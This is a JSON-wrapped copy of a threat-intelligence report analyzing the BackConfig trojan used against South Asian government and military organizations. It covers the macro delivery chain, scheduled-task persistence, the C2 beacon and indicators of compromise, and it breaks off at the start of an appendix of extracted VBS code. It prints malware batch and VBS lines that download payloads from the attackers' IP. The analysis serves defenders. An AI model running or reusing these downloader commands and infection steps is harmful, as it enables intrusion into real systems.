{ "id": "13ec52e4-cac1-4a52-80d1-61c703396c0d", "created_at": "2026-04-06T00:11:18.262266Z", "updated_at": "2026-04-10T03:33:03.113866Z", "deleted_at": null, "sha1_hash": "d39ee9fb22106b3f9da17e504c910b97f200bbd5", "title": "Updated BackConfig Malware Targeting Government and Military Organizations in South Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1475079, "plain_text": "Updated BackConfig Malware Targeting Government and Military\r\nOrganizations in South Asia\r\nBy Alex Hinchliffe, Robert Falcone\r\nPublished: 2020-05-12 · Archived: 2026-04-02 12:26:59 UTC\r\nExecutive Summary\r\nUnit 42 has observed activity over the last 4 months involving the BackConfig malware used by the Hangover\r\nthreat group (aka Neon, Viceroy Tiger, MONSOON). Targets of the spear-phishing attacks, using local and topical\r\nlures, included government and military organizations in South Asia.\r\nThe BackConfig custom trojan has a flexible plug-in architecture for components offering various features,\r\nincluding the ability to gather system and keylog information and to upload and execute additional payloads.\r\nThe initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised\r\nlegitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for\r\nApplications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of\r\nmultiple components that result in the plug-in loader payload being downloaded and executed. The modular nature\r\ncertainly allows for quicker changes to individual components and, perhaps more importantly for the attackers,\r\nsplits up the malicious behaviors in such a way that could thwart sandbox and dynamic analysis systems,\r\nespecially when analyzing the components in isolation.\r\nOur threat prevention platform with WildFire detects activity associated with this threat group, while\r\nsimultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or\r\ncompromised domains that have been identified.\r\nIndicators of compromise related to this research are documented at the end of this report and in the Adversary\r\nPlaybook for the Hangover threat group that can be accessed in the Unit 42 Playbook Viewer.\r\nStarting Point\r\nUnit 42 first saw activity involving the Windows PE executable file (SHA256:\r\n84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c) when searching AutoFocus data\r\nrelated to particular sectors and countries of interest.\r\nThe file was first seen on January 19th, 2020, having been downloaded by two organizations -- a government\r\ndepartment in one country and a military organization in another -- within minutes of each other. The source of the\r\ndownload was http://212.114.52[.]148/request/httpsrequest and the file httpsrequest was stored locally as\r\ndphc.exe. More details on how the malware was delivered are described later in the blog.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 1 of 20\n\nThe choice of terminology in URL paths and file names when delivering BackConfig malware in this, and other\r\ncampaigns discussed later on, is clearly to blend in as benign operations, paths and filenames. Although spelled\r\ndifferently, it could be easy to believe the payload relates to the DHCP networking service.\r\nThe purpose of this malware is to allow the actors to download and execute an executable file, as well as\r\ndownload and run batch files to run commands on the end system.\r\nThis sample has a custom \"decryption\" routine that subtracts six from each character. The following strings are\r\ndecrypted using this method:\r\nlinkrequest[.]live\r\n\\\\Adobe\\\\Driver\\\\dwg\\\\pid.txt\r\n\\\\Adobe\\\\Driver\\\\dwg\\\\\r\n\\\\Adobe\\\\Driver\\\\dwg\\\\wuaupdt.exe\r\nThe Trojan reads the following file to use in the URL of the C2 beacon. If the file does not exist, the executable\r\nwill exit without performing any further activities. The pid.txt file is created during the earlier delivery and\r\ninstallation phases starting with the weaponized Excel document. More information about this setup process is\r\ncovered later in the delivery section. As previously mentioned, this behavior makes an automated analysis of the\r\nindividual executable payload component harder.\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\r\nThe C2 channel uses HTTPS thanks to the INTERNET_FLAG_SECURE flag used when calling the\r\nHttpOpenRequestA function. The beacon HTTP request will look like the following:\r\nGET /orderme/[contents of pid.txt file] HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW\r\nHost: linkrequest[.]live [resolving to 23.106.123[.]87]\r\nThe Trojan will look for the following field and values within the HTTP response header:\r\n\"Content-Type: application\"\r\n\"Content-Type: xDvsds\"\r\n\"Content-Type: Bw11eW\"\r\nIf the content-type field contains a value of application, the Trojan will extract a filename from the HTTP response\r\nheaders between the string filename and Content-Transfer-Encoding. It will use this filename to create a file in the\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\ folder, which it will write the data in the HTTP response to. Based on the\r\nother two Content-Types, we believe the filename provided will be either \"wuaupdt.exe\" or test.bat.\r\nIf the content-type field has a value of xDvsds, the Trojan will attempt to execute the following file using\r\nShellExecuteA and the \"open\" method:\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\wuaupdt.exe\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 2 of 20\n\nIf the content-type field has a value of Bw11eW, the Trojan will attempt to execute the following file using\r\nShellExecuteA and the \"open\" method:\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\test.bat\r\nAt the time of writing, the C2 appeared inoperational and no further payloads were seen. We believe that the\r\nresultant wuaupdt.exe file would then provide further capabilities to steal information, log keystrokes, and provide\r\nthe ability to run additional commands either directly or via additional plugins which it would download, as\r\ndocumented by the Qihoo 360 Threat Intelligence group in their investigation of prior campaigns here.\r\nUnit 42 has conducted cursory binary diffing for many of the BackConfig executable files and did not find any\r\nnon-library function overlaps that would suggest that the payloads are based on the YTY or EHDev frameworks as\r\nmentioned here and here.\r\nPE Metadata\r\nThe malware sample contains some interesting static artifacts including self-signed digital certificates used to sign\r\nthe executable purporting to be software from the Foxit Software Incorporated company based in California. It is\r\nnot known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as\r\npreviously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy.\r\nUsing this meta-data, together with information gleaned from infrastructure investigation, Unit 42 were able to\r\npivot around on AutoFocus data to find additional BackConfig PE executable samples. Those samples from the\r\nlast 12 months are listed in Tables 1 and 2 below.\r\nSHA256 Compilation Time (UTC) First Seen (Pacific) Signer Name\r\n84e5629... 01/20/2020 7:26:09am 01/19/2020 11:49:03pm\r\nFoxit Software Incorporated\r\n18ce3ee... 10/10/2019 9:22:11am 01/16/2020 4:30:26pm\r\n4a4bc01... 11/21/2019 9:19:49am 01/16/2020 1:31:46am\r\n91c67c1... 11/21/2019 9:19:49am 12/02/2019 2:03:41am wind0ws\r\nde5b670... 11/21/2019 9:19:49am 11/21/2019 11:59:05pm\r\nf79ebf0... 10/28/2019 5:35:26am 11/09/2019 10:32:09pm NVIDIA Corporation\r\n31faeef... 10/10/2019 9:22:11am 10/13/2019 10:11:04pm Foxit Software Incorporated\r\nd87b875... 09/12/2019 5:54:04am 09/26/2019 9:32:19am Digicert Global\r\n1510996... 12/05/2018 4:35:03am 04/09/2019 10:30:16am Foxit Software Incorporated\r\nTable 1. Describing PE compile times and Digital signatures used, ordered by first seen.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 3 of 20\n\nThe Compilation Time stored in executable (SHA256: 84e5629...) appears to be after the point at which the file\r\nwas first seen by our WildFire analysis system. While the PE file timestamp could be modified post-compilation,\r\nthe oddity is more likely explained away with time zones -- 2349 Pacific time on the 19th is 1349 in Bangladesh\r\non the 20th, and 7:26am UTC is in the range of 11:26 to 13:26 across the South Asia region, which would make\r\nthe sample compilation quite recent with respect to the delivery of it.\r\nMore details about the self-signed digital certificates, as well as full hashes, can be found in the IOCs section at\r\nthe end of this report.\r\nThe following table shows the version information from the same PE files, grouped by similar File Description\r\nfields. The order remains the same, except for the sample (SHA256: 18ce3ee...) which was first seen January 16th,\r\n2020 but for some reason reverted to using exact version information seen in samples two to three months prior.\r\nNamely, Link Finder.\r\nSHA256\r\nFile\r\nDescription\r\nFile\r\nVersion\r\nProduct\r\nName\r\nProduct\r\nVersion\r\nCopyright\r\n84e5629...\r\nАльберт\r\n(Albert, in\r\nEnglish)\r\n06.10.2015 Альберт 01.05.2015\r\nCopyright @ 2015-2026\r\nsecosec\r\n4a4bc01... Ссылка\r\n(Link, in\r\nEnglish)\r\n01.01.12 ссылка 10.01.2015\r\nCopyright @ 2011-2021\r\nsecosec Inc. Все права\r\nзащищеныk (All rights\r\nreserved, in English)\r\n91c67c1...\r\nde5b670...\r\n18ce3ee...\r\nLink Finder 01.01.12\r\nLink\r\nFinder\r\n13,9,1632\r\nCopyright @2011-2020\r\nTechtest Inc. All Rights\r\nReserved\r\nf79ebf0...\r\n31faeef...\r\nd87b875... scrapper 01.12.001 scrapper 13,6,1662\r\nCopyright @Scrapper Ltd\r\nReserved\r\n1510996... system process 2,1,1,2015\r\nsystem\r\nprocess\r\ncleaner\r\n2,1,1,2015\r\nCopyright © 2004-2018\r\nFoxit Software Inc. All\r\nRights Reserved\r\nTable 2. Describing PE version info metadata, ordered by first seen and grouped on matching data.\r\nOf the set, the file (SHA256: 1510996...) has most consistency in terms of a theme, using the Foxit Copyright\r\ninformation, self-signed digital signature and even using the company logo, as shown in the Figure below, for the\r\nexecutable file’s icon. The file’s copyright information only differs from that of Foxit’s Reader software by a\r\nmissing period symbol, implying it was copied rather than created.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 4 of 20\n\nThe actors then moved to use seemingly fictitious company and product names while using a mixture of signer\r\nnames in their digital signatures. No file icons were used at all over the last 11 months.\r\nRecent samples also included Cyrillic text in the file description, product name, and copyright fields, as shown\r\nand translated in the table above. It’s hard to know if this is an attempt to set false flags as to the origins of the\r\nBackConfig malware, or perhaps to make the content more relevant to specific targets within the victim\r\norganizations.\r\nDelivery and Installation\r\nIn this section, we describe how the various payloads are delivered based on what we have seen in our customer\r\nnetworks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence\r\nof weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL\r\nlinks in emails appear to be the Hangover group’s modus operandi.\r\nThe remainder of this section focuses largely on Object Linking and Embedding (OLE) Microsoft Excel\r\ndocuments, as they are most commonly used by the Hangover group, at least when it comes to the BackConfig\r\nmalware. Through infrastructure analysis however, Unit 42 was able to find a BackConfig PE sample (SHA256:\r\ne28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f; first seen 10/24/2019) using the C2\r\ndomain matissues[.]com and dropped by the weaponised Rich Text Format (RTF) file (SHA256:\r\n752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f) from the same day. The RTF used the\r\nCVE-2017-11882 exploit against equation editor vulnerabilities in Office applications to execute the PE sample\r\nwhich was a unique exploitation method compared to all other samples analyzed.\r\nCompromised Third-Party Infrastructure\r\nContinuing to pivot on data obtained from the samples found thus far, we discovered some related URLs relating\r\nto compromised third-party infrastructure supporting the delivery of the BackConfig malware. The following table\r\nlists some examples of compromised sites delivering weaponised XLS files with filenames, such as\r\nCircular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf) and\r\nCircullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb)\r\nimplying (even with incorrect spelling) that the contents is, or relates to, a letter or advertisement which is\r\ndistributed to a large number of people.\r\nSHA-256\r\nFirst\r\nSeen\r\nRelated URL Description Location\r\nbe3f12b...\r\n2019-\r\n10\r\nhttp://nsaimmigration[.]com/userfiles/image/\r\nfbr.php and nphp_registration_form.php (both\r\nHTTP 404)\r\nConsultant and\r\nLegal Advice\r\ncompany\r\nsupporting students\r\nto live and study\r\nabroad.\r\nPakistan\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 5 of 20\n\n0aa5cf1...\r\n2018-\r\n09\r\nhttp://webtechhub[.]com/wordpress/wp-content/images/fbr_circular.php\r\nWeb design and\r\ndev site running\r\noutdated\r\nWordPress\r\napplication\r\nPakistan\r\ned638b5...\r\n2017-\r\n11\r\nhttp://alphamike.com[.]mv/housing\r\nShipping agency\r\nfor freight\r\nforwarding and\r\ncargo delivery.\r\nMaldives\r\nhttp://mgamphs.edu[.]bd/info/ (down)\r\nMuhurigonj\r\nAcademy of Music\r\nand Performance\r\nHigh School.\r\nReference.\r\nBangladesh\r\nTable 3. Compromised third-party infrastructure to support delivery of BackConfig.\r\nGiven the targeting related to these threats, and the compromised third-party websites, we believe the use of “fbr”\r\nin some of the URLs above likely relates to the Federal Board of Revenue (FBR) government organization of\r\nPakistan. The “fbr” theme also runs into the VBA macro code. File ed638b5... contains the statement Const\r\nWelcomePage = \"FBR\".\r\nThe old compromised hosting examples in Table 3 above do not rely on Hypertext Preprocessor (PHP) server-side\r\nscripts to deliver the weaponized XLS files. Instead, the pages simply used HTTP response status 301 (Moved\r\nPermanently) for URL redirection to said XLS, initiating the download. More recent examples make use of PHP\r\nwith URL filenames matching the social engineering theme, such as “fbr”. In addition, the actors use the PHP\r\nscript to log any visitors to the page noting in a file named “info.txt” the datetime stamp of the event, the client\r\noperating system, and their IP address.\r\nThe location of the compromised third-party infrastructure or the organizations legitimately using them, align with\r\nthe targeting Unit 42 has seen. This could be pure coincidence, a sign from the threat actors that their intention is\r\nto take advantage of weaknesses in the target country’s wider infrastructure, or the threat actors leveraging in-country infrastructure that may be considered more trustworthy by the intended victims and their security\r\nsolutions.\r\nPalo Alto Networks’ WildFire sandbox analyzed sample ed638b5... on November 8th, 2017, and, as described in\r\nthe table above, the sample was hosted on two compromised websites: a Bangladesh school and a Maldivan\r\nshipping agency. While Unit 42 has not seen Hangover activity in the Maldives, the archipelago is in the region\r\nalongside other known targets and interestingly, swore in a new President about a week after Unit 42 analyzed the\r\nsample.\r\nThe EXE payload (SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd)\r\ndownloaded directly by the VBA code in sample ed638b5... from the URL below relates to those documented by\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 6 of 20\n\nBitDefender here. To date, Unit 42 has only seen 6 similar samples since the late-2017 timeframe for this sample,\r\ncompared to many more prior, perhaps indicating a change over of the custom payloads used by the Hangover\r\ngroup. Certainly, there are some overlaping Tactics Techniques and Procedures (TTPs) between the older samples\r\nand the more recent BackConfig samples.\r\nhttp://chancetowin.quezknal[.]net/appstore/updatepatch/logs.exe\r\nEvolution of Delivery Payloads\r\nBefore moving on to describe the most recent samples and installation methods used by the Hangover actors, the\r\ntimeline figure below provides a high-level view of the evolution in TTPs used.\r\nFigure 2. Evolution of delivery payloads\r\nDespite the evolution over the years, some habits are hard to break. Firstly, every weaponized XLS Unit 42 has\r\ninvestigated loads a fake error message, such as the one shown in Figure 3 below, to trick the victim into thinking\r\nthat the file is corrupt and thus nothing has -- or will -- load as intended. Another fictitious error message text has\r\nbeen used in the past often with poor spelling or grammar.\r\nFigure 3. Example fake error message displayed to the victim.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 7 of 20\n\nSimilarly, the version information metadata stored in all the Excel documents analyzed share the same Author and\r\nLast Modified By names - Testing.\r\nThe following subsections describe the campaigns and malware as highlighted by the three most recent milestones\r\nin the timeline figure above.\r\n2019 Milestone: Multi-Component\r\nRegistration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461)\r\nlisted in Table 3 above provides an example of the types of lures used by the threat actors.\r\nUpon opening the XLS and enabling the macro code, the picture in Figure 4 below is shown on top white-background cells. As the filename suggests, it’s a registration form and relates to the Naya Pakistan Housing\r\nprogram run by the Pakistani government to help solve the housing shortfall in the country. Eligible citizens\r\ninclude government employees and registration forms were due by October 15th, 2019 (extended through\r\nNovember 15th), meaning the timing and the lure of the campaign on October 25th were clearly planned to\r\nincrease the chances of compromise.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 8 of 20\n\nFigure 4. Social engineering lure against Pakistan government in October 2019\r\nAs the PHP webpages did not exist at the time of writing, Unit 42 cannot prove the XLS file be3f12b... was hosted\r\nat the URL listed in row 1 of Table 3 above. However, because of the following points, we have high confidence\r\nin the campaign relationship between the two.\r\n1. 1. AutoFocus and VirusTotal first processed the XLS file be3f12b... on October 25th, 2019\r\n2. VirusTotal processed the nsaimmigration... URL on the same day\r\n3. A specific HTTP GET request URL using the notation nphp_registration_form.php?r= was\r\nprocessed in VirusTotal on the same day, and has relations to\r\nhttp://185.203.119[.]184/fin_div/session, which matches the IP address and URL structure in the\r\nVBS code dropped by the XLS be3f12b....\r\n4. The name of the PHP webpage nphp_registration_form.php relates to the filename of the XLS.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 9 of 20\n\nThe VBA macro code in the XLS file be3f12b... differed somewhat from that of the samples of the previous years.\r\nInstead of directly storing encoded EXE files or running batch shell commands directly from the VBA code itself,\r\nit retrieved the content from hidden columns in the Excel sheet, starting at column 27 or “AA”, which is likely to\r\nbe off-screen for most people. Once the font colour was changed, the “setup” batch code component as per\r\nprevious variants, and the new Visual Basic Script (VBS) downloader component were revealed in columns AA\r\nand AB, respectively, as shown in figure 5 below.\r\nFigure 5. VBS downloader and BAT setup file revealed in the XLS sheet.\r\nMacro VBA code in the XLS parses the content of the two columns line by line writing the contents to their\r\nrespective files on disk and executing them following the same process flow as described below in Figure 6.\r\n2019 Milestone: BITS and ZIPs\r\nA more recent weaponized XLS file (SHA256:\r\n021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b) was analyzed by WildFire on\r\nNovember 15th, 2019 and exposed some new techniques. On this occasion, the VBA macro code contained a\r\ndecimal-encoded ZIP file of only 1,062 bytes in size. Inside the ZIP archive were two text files that would be\r\ndecompressed to a folder driverkit. One file, driverkit.bat, is the “setup” BAT file already discussed in this report\r\nand listed in the appendix section. The other file, Winmgt.txt, is an adaptation of the VBS downloaded also\r\ndescribed in this report. However, instead of a direct HTTP download using an MSXML DOM object, this version\r\nwrites the following contents to Winmgt_Drive.bat, which is executed by a third scheduled task created by the\r\n“setup” BAT file.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 10 of 20\n\necho off\r\nbitsadmin /transfer Microsoft_Update /download /priority high\r\nhttp://185.203.119[.]184/winmgt/winmgt.exe\r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\winmgt.exe\r\ndel %0\r\n2020 Milestone: Fine Tuning\r\nThe following execution flow diagram is based on one of the most recent weaponized documents Unit 42 has seen\r\nInvoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c; first seen\r\n2020-01-15).\r\nThe infection process consists of multiple components as just described. The “setup” batch (BAT) file coordinates\r\nmuch of the infection process of the BackConfig plug-in loader once the VBA has written it to disk and executed\r\nit.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 11 of 20\n\nFigure 6. Execution flow of BackConfig malware\r\nThe numbered bullet list below describes Figure 6.\r\n1. 1. Text file Drive.txt (SHA-256:\r\n4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and\r\ncontains the decimal-decoded VBS content.\r\n2. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both\r\nfiles is shown in the appendix section of this report.\r\n3. Audio.txt is renamed to Audio.bat and executed.\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 12 of 20\n\n4. Audio.bat cleans up any files and folders related to previous infections, and recreates the required\r\nenvironment including creating the aforementioned pid.txt file, and setting various folders and files\r\nto be hidden from a default Windows Explorer view. The contents of pid.txt is the victim’s computer\r\nname concatenated with a hyphen followed by a random number, although I believe the code used\r\nwould not work as intended.\r\n5. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist:\r\ndphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals.\r\n6. Finally, before deleting itself, Audio.bat will rename Drive.txt to Drive.vbs. When Drive.vbs is\r\neventually executed by the task scheduler, it will download the BackConfig executable payload. In\r\nthe case of file 8892279f3... the remote location is http://185.203.119[.]184/Dropbox/request.\r\n7. When dphc.exe is eventually executed by the task scheduler, it first checks for the presence of\r\npid.txt (step 4.) and only continues if the file exists.\r\nUltimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system\r\nsettings and creates two scheduled tasks. However, this behaviour may not be enough to determine the\r\ncomponents as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component\r\nand launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring.\r\nATT\u0026CK\r\nThe following table describes the TTPs associated with the multiple campaigns described in this report.\r\nTactic Technique (Mitre ATT\u0026CK ID)\r\nTechnical Information Gathering\r\nAcquire OSINT data sets and information (T1247)\r\nConduct social engineering (T1249)\r\nAdversary Opsec Compromise 3rd party infrastructure to support delivery (T1312)\r\nBuild Capabilities\r\nCreate custom payloads (T1345)\r\nObtain/re-use payloads (T1346)\r\nStage Capabilities Upload, install, and configure software/tools (T1362)\r\nInitial Compromise Spear Phishing Link (T1192)\r\nExecution\r\nUser Execution (T1204)\r\nExploitation for Client Execution (T1203)\r\nExecution, Persistence Scheduled Task (T1053)\r\nDefense Evasion Code Signing (T1116)\r\nDeobfuscate/Decode Files or Information (T1140)\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 13 of 20\n\nHidden Files and Directories (T1158)\r\nObfuscated Files or Information (T1027)\r\nDefense Evasion, Execution Scripting (T1064)\r\nDefense Evasion, Persistence BITS Jobs (T1197)\r\nCommand \u0026 Control\r\nCommonly Used Port (T1043)\r\nStandard Application Layer Protocol (T1071)\r\nStandard Cryptographic Protocol (T1032)\r\nRemote File Copy (T1105)\r\nConclusion\r\nThe Hangover group (aka Neon, Viceroy Tiger, MONSOON) is active and targeting, according to Unit 42’s\r\nvisibility, government and military organisations in South Asia using spear-phishing emails containing letters or\r\ngovernment forms to lure victims into browsing to compromised websites serving weaponized Excel documents\r\nthat install the BackConfig Trojan. Almost exclusively, Unit 42 has seen the use of weaponized documents that\r\nrequire user execution. Only once in the last six months have we seen use of exploits to circumvent the need for\r\nthe user to execute any part of the installation chain.\r\nThe evolution of BackConfig’s primary and secondary payloads has seen different methods used for executing\r\ncommands and deploying executables both with and without obfuscation.\r\nThe latest versions contain modular components making it easier to update and re-use code in order to rapidly\r\ndeploy their campaigns in a timely manner to have the highest chance of success. The method in which the latest\r\nsamples execute also indicates the group’s focus on trying to evade sandbox and other automated analysis systems\r\nby breaking down malicious activity into chunks that each seem relatively benign.\r\nProtections:\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org. (This is added to blogs pre-shared with the CTA, when loaded into\r\nWordPress it will be added when appropriate).\r\nIndicators of Compromise\r\nDelivery Documents\r\n56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6\r\n8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 14 of 20\n\n021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b\r\nbe3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461\r\n0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf\r\ned638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb\r\n752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (RTF using CVE-2017-11882)\r\nBatch Files\r\n4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt / .bat from\r\nNaya Housing campaign)\r\nC94f7733fc9bdbcb503efd000e5aef66d494291ae40fc516bb040b0d1d8b46c9\r\n6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3\r\n750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580\r\n5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295\r\nf64dbcd8b75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e\r\n98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e\r\n29c5dd19b577162fe76a623d9a6dc558cfbd6cddca64ed53e870fe4b66b44096 (driverkit.bat)\r\nabe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat uses bitsadmin)\r\n02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea786c\r\nVBS files\r\n87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya\r\nHousing campaign)\r\n952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)\r\na1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)\r\nEXE Payloads\r\n306fe259a250b2f0d939322cfb97787c4076c357fc9eb1f1cc10b0060f27f644\r\n0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c8bdbefb215fe92\r\n84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c\r\n18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd8b9\r\n922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709\r\n4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5\r\n677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2\r\nd3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f\r\n91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1\r\nde5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a\r\nf79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c6cf19d361b0494e7b\r\n9e141fe67521b75412419a8c88c199c8ebd2a135c7a8b58edced454fbc33cb77\r\n6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e\r\ne28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f\r\n07c97b253452a2a8eb7753ed8c333efeaa3546c005ffcfb5b3d71dc61c49abda\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 15 of 20\n\n31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848\r\n15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892\r\nD87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861\r\n167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e\r\n4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (example of older set of\r\ndownloaders)\r\nb18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)\r\nInfrastructure\r\nlinkrequest[.]live (23.106.123[.]87)\r\nmatissues[.]com\r\nunique.fontsupdate[.]com\r\n185.203.119[.]184\r\n212.114.52[.]148\r\nDigital Signatures\r\nThe following list of self-signed digital certificates is not exhaustive, and only relates to those seen on BackConfig\r\nPE executables samples over the past twelve months.\r\nFoxit:\r\nthumbprint: 79635cb32cf16cf6bddfd563b09d7aa99ccb2c01\r\nissuer: CN=Foxit Software Incorporated\r\nsubject: CN=Foxit Software Incorporated\r\nversion: 3\r\nalgorithm: sha1WithRSAEncryption\r\nserial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8\r\nvalid from: 1/1/2018\r\nvalid to: 1/1/2024\r\nWind0ws:\r\nthumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0\r\nissuer: CN=wind0ws\r\nsubject: CN=wind0ws\r\nversion: 3\r\nalgorithm: sha1WithRSAEncryption\r\nserial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70\r\nvalid from: 1/1/2019\r\nvalid to: 1/1/2025\r\nNVIDIA:\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 16 of 20\n\nthumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3\r\nissuer: CN=NVIDIA Corporation\r\nsubject: CN=NVIDIA Corporation\r\nversion: 3\r\nalgorithm: sha1WithRSAEncryption\r\nserial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1\r\nvalid from: 1/1/2019\r\nvalid to: 1/1/2025\r\nAppendix\r\nThe following VBS and BAT code was extracted from XLS sample (SHA-256:\r\n8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83).\r\nVBS downloader component (SHA256:\r\n4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)\r\n[Drive.txt -\u003e Drive.vbs CODE]\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\nstrFileURL = \"http://\u003cstrong\u003e185.203.119[.]184/Dropbox/request\"\u003c/strong\u003e\r\nSet oShell = 